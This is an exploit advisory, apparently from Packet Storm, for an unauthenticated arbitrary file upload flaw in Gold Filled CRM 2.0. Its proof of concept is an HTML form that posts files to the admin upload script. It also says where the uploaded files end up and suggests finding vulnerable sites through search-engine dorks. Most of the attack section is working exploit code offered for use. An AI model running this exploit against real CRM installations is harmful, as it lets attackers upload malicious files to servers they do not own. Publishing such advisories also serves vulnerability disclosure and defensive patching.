Gold Filled CRM version 2.0 suffers from an unauthenticated arbitrary file upload vulnerability.
7df5256a62f4b26f1e4415c585d3fa307a8092cdea4dec86c2b611cd1e38214d====================================================================================================================================
| # Title : Gold Filled CRM v 2.0 Remote File Upload vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |
| # Vendor : https://codecanyon.net/ |
| # Dork : |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following html code upload your file remotely
[+] infected file : /feltolt2.php .
[+] This is the path where you will find your uploaded files ( product_images/original/)Exmpl : /product_images/original/index.svg
[+] save code as poc.html .
<br>
<br>
<br>
<br>
<div class="center-block kozep">
<br>
<br>
<center>
<h2>Képek felvitele</h2>
<br>
<br>Termék azonosítója : <br>
<br>
<form action="http://127.0.0.1/goldfilledhu/admin/feltolt2.php" method="post" enctype="multipart/form-data" action="http://127.0.0.1/goldfilledhu/admin/feltolt2.php"><input type="file" name="files[]" multiple="multiple" accept="image/*"><br>
<input name="send" type="submit" value="Feltölt">
<input name="send" type="submit" value="Vissza">
</form>
<br>
<br></center>
</div>
</body>
</html>
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed